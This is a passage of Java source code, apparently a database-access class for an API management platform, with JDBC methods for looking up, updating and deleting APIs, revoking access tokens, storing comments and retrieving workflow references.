tenant getAPIProviderQuery = SQLConstants.GET_API_PROVIDER_WITH_NAME_VERSION_FOR_SUPER_TENANT; prepStmt = connection.prepareStatement(getAPIProviderQuery); } else { //in this case, the API should be fetched from the respective tenant getAPIProviderQuery = SQLConstants.GET_API_PROVIDER_WITH_NAME_VERSION_FOR_GIVEN_TENANT; prepStmt = connection.prepareStatement(getAPIProviderQuery); prepStmt.setString(3, "%" + tenant + "%"); } prepStmt.setString(1, apiName); prepStmt.setString(2, apiVersion); rs = prepStmt.executeQuery(); if (rs.next()) { apiProvider = rs.getString("API_PROVIDER"); } if (StringUtils.isBlank(apiProvider)) { String msg = "Unable to find provider for API: " + apiName + " in the database"; log.warn(msg); } } catch (SQLException e) { handleException("Error while locating API: " + apiName + " from the database", e); } return apiProvider; } /** * Converts an {@code Pipeline} object into a {@code ConditionGroupDTO}.{@code ConditionGroupDTO} class tries to * contain the same information held by {@code Pipeline}, but in a much lightweight fashion. * * @param conditionGroup Id of the condition group ({@code Pipeline}) to be converted * @return An object of {@code ConditionGroupDTO} type. * @throws APIManagementException */ private ConditionGroupDTO createConditionGroupDTO(int conditionGroup) throws APIManagementException { List<Condition> conditions = getConditions(conditionGroup); ArrayList<ConditionDTO> conditionDTOs = new ArrayList<ConditionDTO>(conditions.size()); for (Condition condition : conditions) { ConditionDTO conditionDTO = new ConditionDTO(); conditionDTO.setConditionType(condition.getType()); conditionDTO.isInverted(condition.isInvertCondition()); if (PolicyConstants.IP_RANGE_TYPE.equals(condition.getType())) { IPCondition ipRangeCondition = (IPCondition) condition; conditionDTO.setConditionName(ipRangeCondition.getStartingIP()); conditionDTO.setConditionValue(ipRangeCondition.getEndingIP()); } else if (PolicyConstants.IP_SPECIFIC_TYPE.equals(condition.getType())) { IPCondition ipCondition = (IPCondition) condition; conditionDTO.setConditionName(PolicyConstants.IP_SPECIFIC_TYPE); conditionDTO.setConditionValue(ipCondition.getSpecificIP()); } else if (PolicyConstants.HEADER_TYPE.equals(condition.getType())) { HeaderCondition headerCondition = (HeaderCondition) condition; conditionDTO.setConditionName(headerCondition.getHeaderName()); conditionDTO.setConditionValue(headerCondition.getValue()); } else if (PolicyConstants.JWT_CLAIMS_TYPE.equals(condition.getType())) { JWTClaimsCondition jwtClaimsCondition = (JWTClaimsCondition) condition; conditionDTO.setConditionName(jwtClaimsCondition.getClaimUrl()); conditionDTO.setConditionValue(jwtClaimsCondition.getAttribute()); } else if (PolicyConstants.QUERY_PARAMETER_TYPE.equals(condition.getType())) { QueryParameterCondition parameterCondition = (QueryParameterCondition) condition; conditionDTO.setConditionName(parameterCondition.getParameter()); conditionDTO.setConditionValue(parameterCondition.getValue()); } conditionDTOs.add(conditionDTO); } ConditionGroupDTO conditionGroupDTO = new ConditionGroupDTO(); conditionGroupDTO.setConditions(conditionDTOs.toArray(new ConditionDTO[]{})); return conditionGroupDTO; } public void updateAPI(API api, int tenantId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; String previousDefaultVersion = getDefaultVersion(api.getId()); String query = SQLConstants.UPDATE_API_SQL; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); //Header change check not required here as we update API level throttling tier //from same call. //TODO review and run tier update as separate query if need. prepStmt = connection.prepareStatement(query); prepStmt.setString(1, api.getContext()); String contextTemplate = api.getContextTemplate(); //If the context template ends with {version} this means that the version will be at the end of the // context. if (contextTemplate.endsWith("/" + APIConstants.VERSION_PLACEHOLDER)) { //Remove the {version} part from the context template. contextTemplate = contextTemplate.split(Pattern.quote("/" + APIConstants.VERSION_PLACEHOLDER))[0]; } prepStmt.setString(2, contextTemplate); //TODO Need to find who exactly does this update. prepStmt.setString(3, null); prepStmt.setTimestamp(4, new Timestamp(System.currentTimeMillis())); prepStmt.setString(5, api.getApiLevelPolicy()); prepStmt.setString(6, APIUtil.replaceEmailDomainBack(api.getId().getProviderName())); prepStmt.setString(7, api.getId().getApiName()); prepStmt.setString(8, api.getId().getVersion()); prepStmt.execute(); //} if (api.isDefaultVersion() ^ api.getId().getVersion().equals(previousDefaultVersion)) { //A change has // happen //If the api is selected as default version, it is added/replaced into AM_API_DEFAULT_VERSION table if (api.isDefaultVersion()) { addUpdateAPIAsDefaultVersion(api, connection); } else { //tick is removed removeAPIFromDefaultVersion(api.getId(), connection); } } connection.commit(); //check whether there are any associated api products before updating url temaplates and scopes //TODO move to constants String queryGetAssociatedAPIProducts = "SELECT AM_API_PRODUCT.UUID " + "FROM AM_API_PRODUCT_MAPPING, AM_API_URL_MAPPING, AM_API_PRODUCT " + "WHERE " + "AM_API_PRODUCT_MAPPING.URL_MAPPING_ID = AM_API_URL_MAPPING.URL_MAPPING_ID " + "AND AM_API_PRODUCT.API_PRODUCT_ID = AM_API_PRODUCT_MAPPING.API_PRODUCT_ID " + "AND API_ID = ?"; int apiId = getAPIID(api.getId(), connection); PreparedStatement prepStmtGetAssociatedAPIProducts = connection .prepareStatement(queryGetAssociatedAPIProducts); prepStmtGetAssociatedAPIProducts.setInt(1, apiId); ResultSet rs = null; rs = prepStmtGetAssociatedAPIProducts.executeQuery(); List<APIProduct> apiProducts = new ArrayList<APIProduct>(); while (rs.next()) { String productUUID = rs.getString("UUID"); apiProducts.add(getAPIProduct(productUUID)); } synchronized (scopeMutex) { //remove api product mappings before updating api url templates deleteProductMappingsForAPI(api, apiProducts); updateScopes(api, tenantId); updateURLTemplates(api); /* update scopes above will delete all scopes and scope mappings associated with API (including product scopes). after update url templates template ids will change. So we have to add product scopes and mappings again after updating api templates */ addProductMappingsForAPI(api, apiProducts); addProductScopes(apiProducts, tenantId); } } catch (SQLException e) { handleException("Error while updating the API: " + api.getId() + " in the database", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } } public int getAPIID(APIIdentifier apiId, Connection connection) throws APIManagementException { boolean created = false; PreparedStatement prepStmt = null; ResultSet rs = null; int id = -1; String getAPIQuery = SQLConstants.GET_API_ID_SQL; try { if (connection == null) { // If connection is not provided a new one will be created. connection = APIMgtDBUtil.getConnection(); created = true; } prepStmt = connection.prepareStatement(getAPIQuery); prepStmt.setString(1, APIUtil.replaceEmailDomainBack(apiId.getProviderName())); prepStmt.setString(2, apiId.getApiName()); prepStmt.setString(3, apiId.getVersion()); rs = prepStmt.executeQuery(); if (rs.next()) { id = rs.getInt("API_ID"); } if (id == -1) { String msg = "Unable to find the API: " + apiId + " in the database"; log.error(msg); throw new APIManagementException(msg); } } catch (SQLException e) { handleException("Error while locating API: " + apiId + " from the database", e); } finally { if (created) { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } else { APIMgtDBUtil.closeAllConnections(prepStmt, null, rs); } } return id; } /** * Get product Id from the product name and the provider. * @param productName product name * @param provider provider * @param connection db connection * @return product id * @throws APIManagementException exception */ public int getAPIProductID(String productName, String provider, Connection connection) throws APIManagementException { boolean created = false; PreparedStatement prepStmt = null; ResultSet rs = null; int id = -1; String getAPIQuery = SQLConstants.GET_API_PRODUCT_ID_SQL; try { if (connection == null) { // If connection is not provided a new one will be created. connection = APIMgtDBUtil.getConnection(); created = true; } prepStmt = connection.prepareStatement(getAPIQuery); prepStmt.setString(1, APIUtil.replaceEmailDomainBack(provider)); prepStmt.setString(2, productName); rs = prepStmt.executeQuery(); if (rs.next()) { id = rs.getInt("API_PRODUCT_ID"); } if (id == -1) { String msg = "Unable to find the API Product : " + productName + "-" + provider + " in the database"; log.error(msg); throw new APIManagementException(msg); } } catch (SQLException e) { handleException("Error while locating API: " + productName + "-" + provider + " from the database", e); } finally { if (created) { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } else { APIMgtDBUtil.closeAllConnections(prepStmt, null, rs); } } return id; } /** * Delete a record from AM_APPLICATION_KEY_MAPPING table * * @param consumerKey * @throws APIManagementException */ public void deleteApplicationMappingByConsumerKey(String consumerKey) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; String deleteApplicationKeyQuery = SQLConstants.REMOVE_APPLICATION_MAPPINGS_BY_CONSUMER_KEY_SQL; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); prepStmt = connection.prepareStatement(deleteApplicationKeyQuery); prepStmt.setString(1, consumerKey); prepStmt.execute(); connection.commit(); } catch (SQLException e) { handleException("Error while deleting mapping: consumer key " + consumerKey + " from the database", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } } public void deleteAPI(APIIdentifier apiId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; int id; String deleteLCEventQuery = SQLConstants.REMOVE_FROM_API_LIFECYCLE_SQL; String deleteCommentQuery = SQLConstants.REMOVE_FROM_API_COMMENT_SQL; String deleteRatingsQuery = SQLConstants.REMOVE_FROM_API_RATING_SQL; String deleteSubscriptionQuery = SQLConstants.REMOVE_FROM_API_SUBSCRIPTION_SQL; String deleteExternalAPIStoresQuery = SQLConstants.REMOVE_FROM_EXTERNAL_STORES_SQL; String deleteAPIQuery = SQLConstants.REMOVE_FROM_API_SQL; String deleteURLTemplateQuery = SQLConstants.REMOVE_FROM_API_URL_MAPPINGS_SQL; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); id = getAPIID(apiId, connection); synchronized (scopeMutex) { removeAPIScope(apiId); } prepStmt = connection.prepareStatement(deleteSubscriptionQuery); prepStmt.setInt(1, id); prepStmt.execute(); prepStmt.close();//If exception occurs at execute, this statement will close in finally else here //Delete all comments associated with given API prepStmt = connection.prepareStatement(deleteCommentQuery); prepStmt.setInt(1, id); prepStmt.execute(); prepStmt.close();//If exception occurs at execute, this statement will close in finally else here prepStmt = connection.prepareStatement(deleteRatingsQuery); prepStmt.setInt(1, id); prepStmt.execute(); prepStmt.close();//If exception occurs at execute, this statement will close in finally else here prepStmt = connection.prepareStatement(deleteLCEventQuery); prepStmt.setInt(1, id); prepStmt.execute(); prepStmt.close();//If exception occurs at execute, this statement will close in finally else here //Delete all external APIStore details associated with a given API prepStmt = connection.prepareStatement(deleteExternalAPIStoresQuery); prepStmt.setInt(1, id); prepStmt.execute(); prepStmt.close();//If exception occurs at execute, this statement will close in finally else here prepStmt = connection.prepareStatement(deleteAPIQuery); prepStmt.setString(1, APIUtil.replaceEmailDomainBack(apiId.getProviderName())); prepStmt.setString(2, apiId.getApiName()); prepStmt.setString(3, apiId.getVersion()); prepStmt.execute(); prepStmt.close();//If exception occurs at execute, this statement will close in finally else here prepStmt = connection.prepareStatement(deleteURLTemplateQuery); prepStmt.setInt(1, id); prepStmt.execute(); String curDefaultVersion = getDefaultVersion(apiId); String pubDefaultVersion = getPublishedDefaultVersion(apiId); if (apiId.getVersion().equals(curDefaultVersion)) { removeAPIFromDefaultVersion(apiId, connection); } else if (apiId.getVersion().equals(pubDefaultVersion)) { setPublishedDefVersion(apiId, connection, null); } connection.commit(); } catch (SQLException e) { handleException("Error while removing the API: " + apiId + " from the database", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } } /** * Change access token status in to revoked in database level. * * @param key API Key to be revoked * @throws APIManagementException on error in revoking access token */ public void revokeAccessToken(String key) throws APIManagementException { String accessTokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; accessTokenStoreTable = getAccessTokenStoreTableFromAccessToken(key, accessTokenStoreTable); Connection conn = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String query = SQLConstants.REMOVE_ACCESS_TOKEN_PREFIX + accessTokenStoreTable + SQLConstants .REVOKE_ACCESS_TOKEN_SUFFIX; ps = conn.prepareStatement(query); ps.setString(1, APIUtil.encryptToken(key)); ps.execute(); conn.commit(); } catch (SQLException e) { handleException("Error in revoking access token: " + e.getMessage(), e); } catch (CryptoException e) { handleException("Error in revoking access token: " + e.getMessage(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } } /** * Get all applications associated with given tier * * @param tier String tier name * @return Application object array associated with tier * @throws APIManagementException on error in getting applications array */ public Application[] getApplicationsByTier(String tier) throws APIManagementException { if (tier == null) { return null; } Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; Application[] applications = null; String sqlQuery = SQLConstants.GET_APPLICATION_BY_TIER_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, tier); rs = prepStmt.executeQuery(); ArrayList<Application> applicationsList = new ArrayList<Application>(); Application application; while (rs.next()) { application = new Application(rs.getString("NAME"), getSubscriber(rs.getString("SUBSCRIBER_ID"))); application.setId(rs.getInt("APPLICATION_ID")); applicationsList.add(application); } Collections.sort(applicationsList, new Comparator<Application>() { public int compare(Application o1, Application o2) { return o1.getName().compareToIgnoreCase(o2.getName()); } }); applications = applicationsList.toArray(new Application[applicationsList.size()]); } catch (SQLException e) { handleException("Error when reading the application information from" + " the persistence store.", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return applications; } private void handleException(String msg, Throwable t) throws APIManagementException { log.error(msg, t); throw new APIManagementException(msg, t); } public HashMap<String, String> getURITemplatesPerAPIAsString(APIIdentifier identifier) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; int apiId; HashMap<String, String> urlMappings = new LinkedHashMap<String, String>(); try { conn = APIMgtDBUtil.getConnection(); apiId = getAPIID(identifier, conn); String sqlQuery = SQLConstants.GET_URL_TEMPLATES_SQL; ps = conn.prepareStatement(sqlQuery); ps.setInt(1, apiId); resultSet = ps.executeQuery(); while (resultSet.next()) { String script = null; String uriPattern = resultSet.getString("URL_PATTERN"); String httpMethod = resultSet.getString("HTTP_METHOD"); String authScheme = resultSet.getString("AUTH_SCHEME"); String throttlingTier = resultSet.getString("THROTTLING_TIER"); InputStream mediationScriptBlob = resultSet.getBinaryStream("MEDIATION_SCRIPT"); if (mediationScriptBlob != null) { script = APIMgtDBUtil.getStringFromInputStream(mediationScriptBlob); // set null if the script is empty. Otherwise ArrayIndexOutOfBoundsException occurs when trying // to split by :: if (script.isEmpty()) { script = null; } } urlMappings.put(uriPattern + "::" + httpMethod + "::" + authScheme + "::" + throttlingTier + "::" + script, null); } } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the add subscription ", e1); } } handleException("Failed to add subscriber data ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return urlMappings; } // This should be only used only when Token Partitioning is enabled. public String getConsumerKeyForTokenWhenTokenPartitioningEnabled(String accessToken) throws APIManagementException { if (APIUtil.checkAccessTokenPartitioningEnabled() && APIUtil.checkUserNameAssertionEnabled()) { String accessTokenStoreTable = APIUtil.getAccessTokenStoreTableFromAccessToken(accessToken); StringBuilder authorizedDomains = new StringBuilder(); String getCKFromTokenSQL = "SELECT CONSUMER_KEY " + " FROM " + accessTokenStoreTable + " WHERE ACCESS_TOKEN = ? "; Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(getCKFromTokenSQL); prepStmt.setString(1, APIUtil.encryptToken(accessToken)); rs = prepStmt.executeQuery(); boolean first = true; while (rs.next()) { String domain = rs.getString(1); if (first) { authorizedDomains.append(domain); first = false; } else { authorizedDomains.append(',').append(domain); } } } catch (SQLException e) { throw new APIManagementException("Error in retrieving access allowing domain list from table.", e); } catch (CryptoException e) { throw new APIManagementException("Error in retrieving access allowing domain list from table.", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return authorizedDomains.toString(); } return null; } public String findConsumerKeyFromAccessToken(String accessToken) throws APIManagementException { String accessTokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; accessTokenStoreTable = getAccessTokenStoreTableFromAccessToken(accessToken, accessTokenStoreTable); Connection connection = null; PreparedStatement smt = null; ResultSet rs = null; String consumerKey = null; try { String getConsumerKeySql = SQLConstants.GET_CONSUMER_KEY_BY_ACCESS_TOKEN_PREFIX + accessTokenStoreTable + SQLConstants.GET_CONSUMER_KEY_BY_ACCESS_TOKEN_SUFFIX; connection = APIMgtDBUtil.getConnection(); smt = connection.prepareStatement(getConsumerKeySql); smt.setString(1, APIUtil.encryptToken(accessToken)); rs = smt.executeQuery(); while (rs.next()) { consumerKey = rs.getString(1); } } catch (SQLException e) { handleException("Error while getting authorized domians.", e); } catch (CryptoException e) { handleException("Error while getting authorized domians.", e); } finally { APIMgtDBUtil.closeAllConnections(smt, connection, rs); } return consumerKey; } /** * Adds a comment for an API * * @param identifier API Identifier * @param commentText Commented Text * @param user User who did the comment * @return Comment ID */ public int addComment(APIIdentifier identifier, String commentText, String user) throws APIManagementException { Connection connection = null; ResultSet resultSet = null; ResultSet insertSet = null; PreparedStatement getPrepStmt = null; PreparedStatement insertPrepStmt = null; int commentId = -1; int apiId = -1; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); String getApiQuery = SQLConstants.GET_API_ID_SQL; getPrepStmt = connection.prepareStatement(getApiQuery); getPrepStmt.setString(1, APIUtil.replaceEmailDomainBack(identifier.getProviderName())); getPrepStmt.setString(2, identifier.getApiName()); getPrepStmt.setString(3, identifier.getVersion()); resultSet = getPrepStmt.executeQuery(); if (resultSet.next()) { apiId = resultSet.getInt("API_ID"); } if (apiId == -1) { String msg = "Unable to get the API ID for: " + identifier; log.error(msg); throw new APIManagementException(msg); } /*This query to update the AM_API_COMMENTS table */ String addCommentQuery = SQLConstants.ADD_COMMENT_SQL; /*Adding data to the AM_API_COMMENTS table*/ String dbProductName = connection.getMetaData().getDatabaseProductName(); insertPrepStmt = connection.prepareStatement(addCommentQuery, new String[]{DBUtils.getConvertedAutoGeneratedColumnName(dbProductName, "comment_id")}); insertPrepStmt.setString(1, commentText); insertPrepStmt.setString(2, user); insertPrepStmt.setTimestamp(3, new Timestamp(System.currentTimeMillis()), Calendar.getInstance()); insertPrepStmt.setInt(4, apiId); insertPrepStmt.executeUpdate(); insertSet = insertPrepStmt.getGeneratedKeys(); while (insertSet.next()) { commentId = Integer.parseInt(insertSet.getString(1)); } connection.commit(); } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the add comment ", e1); } } handleException("Failed to add comment data, for " + identifier.getApiName() + '-' + identifier .getVersion(), e); } finally { APIMgtDBUtil.closeAllConnections(getPrepStmt, connection, resultSet); APIMgtDBUtil.closeAllConnections(insertPrepStmt, null, insertSet); } return commentId; } /** * Returns all the Comments on an API * * @param identifier API Identifier * @return Comment Array * @throws APIManagementException */ public Comment[] getComments(APIIdentifier identifier) throws APIManagementException { List<Comment> commentList = new ArrayList<Comment>(); Connection connection = null; ResultSet resultSet = null; PreparedStatement prepStmt = null; String sqlQuery = SQLConstants.GET_COMMENTS_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, APIUtil.replaceEmailDomainBack(identifier.getProviderName())); prepStmt.setString(2, identifier.getApiName()); prepStmt.setString(3, identifier.getVersion()); resultSet = prepStmt.executeQuery(); while (resultSet.next()) { Comment comment = new Comment(); comment.setText(resultSet.getString("COMMENT_TEXT")); comment.setUser(resultSet.getString("COMMENTED_USER")); comment.setCreatedTime(new java.util.Date(resultSet.getTimestamp("DATE_COMMENTED").getTime())); commentList.add(comment); } } catch (SQLException e) { try { if (connection != null) { connection.rollback(); } } catch (SQLException e1) { log.error("Failed to retrieve comments ", e1); } handleException("Failed to retrieve comments for " + identifier.getApiName() + '-' + identifier .getVersion(), e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, resultSet); } return commentList.toArray(new Comment[commentList.size()]); } public boolean isContextExist(String context) { Connection connection = null; ResultSet resultSet = null; PreparedStatement prepStmt = null; String sql = SQLConstants.GET_API_CONTEXT_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sql); prepStmt.setString(1, context); resultSet = prepStmt.executeQuery(); while (resultSet.next()) { if (resultSet.getString(1) != null) { return true; } } } catch (SQLException e) { log.error("Failed to retrieve the API Context ", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, resultSet); } return false; } public String getAPIContext(APIIdentifier identifier) throws APIManagementException { Connection connection = null; ResultSet resultSet = null; PreparedStatement prepStmt = null; String context = null; String sql = SQLConstants.GET_API_CONTEXT_BY_API_NAME_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sql); prepStmt.setString(1, APIUtil.replaceEmailDomainBack(identifier.getProviderName())); prepStmt.setString(2, identifier.getApiName()); prepStmt.setString(3, identifier.getVersion()); resultSet = prepStmt.executeQuery(); while (resultSet.next()) { context = resultSet.getString(1); } } catch (SQLException e) { log.error("Failed to retrieve the API Context", e); handleException("Failed to retrieve the API Context for " + identifier.getProviderName() + '-' + identifier.getApiName() + '-' + identifier .getVersion(), e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, resultSet); } return context; } public List<String> getAllAvailableContexts() { List<String> contexts = new ArrayList<String>(); Connection connection = null; ResultSet resultSet = null; PreparedStatement prepStmt = null; String sql = SQLConstants.GET_ALL_CONTEXT_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sql); resultSet = prepStmt.executeQuery(); while (resultSet.next()) { contexts.add(resultSet.getString("CONTEXT")); } } catch (SQLException e) { log.error("Failed to retrieve the API Context ", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, resultSet); } return contexts; } public void populateAppRegistrationWorkflowDTO(ApplicationRegistrationWorkflowDTO workflowDTO) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; Application application = null; Subscriber subscriber = null; String registrationEntry = SQLConstants.GET_APPLICATION_REGISTRATION_ENTRY_BY_SUBSCRIBER_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(registrationEntry); ps.setString(1, workflowDTO.getExternalWorkflowReference()); rs = ps.executeQuery(); while (rs.next()) { subscriber = new Subscriber(rs.getString("USER_ID")); subscriber.setId(rs.getInt("SUBSCRIBER_ID")); application = new Application(rs.getString("NAME"), subscriber); application.setId(rs.getInt("APPLICATION_ID")); application.setApplicationWorkFlowStatus(rs.getString("APPLICATION_STATUS")); application.setCallbackUrl(rs.getString("CALLBACK_URL")); application.setDescription(rs.getString("DESCRIPTION")); application.setTier(rs.getString("APPLICATION_TIER")); workflowDTO.setApplication(application); workflowDTO.setKeyType(rs.getString("TOKEN_TYPE")); workflowDTO.setUserName(subscriber.getName()); workflowDTO.setDomainList(rs.getString("ALLOWED_DOMAINS")); workflowDTO.setValidityTime(rs.getLong("VALIDITY_PERIOD")); OAuthAppRequest request = ApplicationUtils.createOauthAppRequest(application.getName(), null, application.getCallbackUrl(), rs .getString("TOKEN_SCOPE"), rs.getString("INPUTS"), application.getTokenType()); workflowDTO.setAppInfoDTO(request); } } catch (SQLException e) { handleException("Error occurred while retrieving an " + "Application Registration Entry for Workflow : " + workflowDTO .getExternalWorkflowReference(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } } public int getApplicationIdForAppRegistration(String workflowReference) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; int appId = -1; String registrationEntry = SQLConstants.GET_APPLICATION_REGISTRATION_ID_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(registrationEntry); ps.setString(1, workflowReference); rs = ps.executeQuery(); while (rs.next()) { appId = rs.getInt("APP_ID"); } } catch (SQLException e) { handleException("Error occurred while retrieving an " + "Application Registration Entry for Workflow : " + workflowReference, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return appId; } /** * Fetches WorkflowReference when given Application Name and UserId. * * @param applicationName * @param userId * @return WorkflowReference * @throws APIManagementException */ public String getWorkflowReference(String applicationName, String userId) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String workflowReference = null; String sqlQuery = SQLConstants.GET_WORKFLOW_ENTRY_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, applicationName); ps.setString(2, userId); rs = ps.executeQuery(); while (rs.next()) { workflowReference = rs.getString("WF_REF"); } } catch (SQLException e) { handleException("Error occurred while getting workflow entry for " + "Application : " + applicationName + " created by " + userId, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return workflowReference; } /** * Fetches WorkflowReference when given Application Name and UserId. * * @param applicationId * @param userId * @return WorkflowReference * @throws APIManagementException */ public String getWorkflowReferenceByApplicationId(int applicationId, String userId) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String workflowReference = null; String sqlQuery = SQLConstants.GET_WORKFLOW_ENTRY_BY_APP_ID_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setInt(1, applicationId); ps.setString(2, userId); rs = ps.executeQuery(); while (rs.next()) { workflowReference = rs.getString("WF_REF"); } } catch (SQLException e) { handleException("Error occurred while getting workflow entry for " + "Application : " + applicationId + " created by " + userId, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return workflowReference; } /** * Retries the WorkflowExternalReference for a application. * * @param appID ID of the application * @return External workflow reference for the application identified * @throws APIManagementException */ public String getExternalWorkflowReferenceByApplicationID(int appID) throws APIManagementException { String workflowExtRef = null; Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_EXTERNAL_WORKFLOW_REFERENCE_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, WorkflowConstants.WF_TYPE_AM_APPLICATION_CREATION); ps.setString(2, String.valueOf(appID)); rs = ps.executeQuery(); // returns only one row while (rs.next()) { workflowExtRef = rs.getString("WF_EXTERNAL_REFERENCE"); } } catch (SQLException e) { handleException("Error occurred while getting workflow entry for " + "Application ID : " + appID, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return workflowExtRef; } /** * Remove workflow entry * * @param workflowReference * @param workflowType * @throws APIManagementException */ public void removeWorkflowEntry(String workflowReference, String workflowType) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; String queryWorkflowDelete = SQLConstants.REMOVE_WORKFLOW_ENTRY_SQL; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); prepStmt = connection.prepareStatement(queryWorkflowDelete); prepStmt.setString(1, workflowType); prepStmt.setString(2, workflowReference); prepStmt.execute(); connection.commit(); } catch (SQLException e) { handleException("Error while deleting workflow entry " + workflowReference + " from the database", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } } /** * Retries the WorkflowExternalReference for a subscription. * * @param identifier APIIdentifier to find the subscribed api * @param appID ID of the application which has the subscription * @return External workflow reference for the subscription identified * @throws APIManagementException */ public String getExternalWorkflowReferenceForSubscription(APIIdentifier identifier, int appID) throws APIManagementException { String workflowExtRef = null; Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; int apiID; int subscriptionID = -1; String sqlQuery = SQLConstants.GET_EXTERNAL_WORKFLOW_REFERENCE_FOR_SUBSCRIPTION_SQL; String postgreSQL = SQLConstants.GET_EXTERNAL_WORKFLOW_REFERENCE_FOR_SUBSCRIPTION_POSTGRE_SQL; try { apiID = getAPIID(identifier, conn); conn = APIMgtDBUtil.getConnection(); if (conn.getMetaData().getDriverName().contains("PostgreSQL")) { sqlQuery = postgreSQL; } ps = conn.prepareStatement(sqlQuery); ps.setInt(1, apiID); ps.setInt(2, appID); ps.setString(3, WorkflowConstants.WF_TYPE_AM_SUBSCRIPTION_CREATION); rs = ps.executeQuery(); // returns only one row while (rs.next()) { workflowExtRef = rs.getString("WF_EXTERNAL_REFERENCE"); } } catch (SQLException e) { handleException("Error occurred while getting workflow entry for " + "Subscription : " + subscriptionID, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return workflowExtRef; } /** * Retries the WorkflowExternalReference for a subscription. * * @param subscriptionId ID of the subscription * @return External workflow reference for the subscription <code>subscriptionId</code> * @throws APIManagementException */ public String getExternalWorkflowReferenceForSubscription(int subscriptionId) throws APIManagementException { String workflowExtRef = null; Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_EXTERNAL_WORKFLOW_FOR_SUBSCRIPTION_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); // setting subscriptionId as string to prevent error when db finds string type IDs for // ApplicationRegistration workflows ps.setString(1, String.valueOf(subscriptionId)); ps.setString(2, WorkflowConstants.WF_TYPE_AM_SUBSCRIPTION_CREATION); rs = ps.executeQuery(); // returns only one row while (rs.next()) { workflowExtRef = rs.getString("WF_EXTERNAL_REFERENCE"); } } catch (SQLException e) { handleException("Error occurred while getting workflow entry for " + "Subscription : " + subscriptionId, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return workflowExtRef; } /** * Retries the WorkflowExternalReference for an user signup by DOMAIN/username. * * @param usernameWithDomain username of the signed up user inthe format of DOMAIN/username * @return External workflow reference for the signup workflow entry * @throws APIManagementException */ public String getExternalWorkflowReferenceForUserSignup(String usernameWithDomain) throws APIManagementException { String workflowExtRef = null; Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_EXTERNAL_WORKFLOW_FOR_SIGNUP_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, usernameWithDomain); ps.setString(2, WorkflowConstants.WF_TYPE_AM_USER_SIGNUP); rs = ps.executeQuery(); // returns only one row while (rs.next()) { workflowExtRef = rs.getString("WF_EXTERNAL_REFERENCE"); } } catch (SQLException e) { handleException("Error 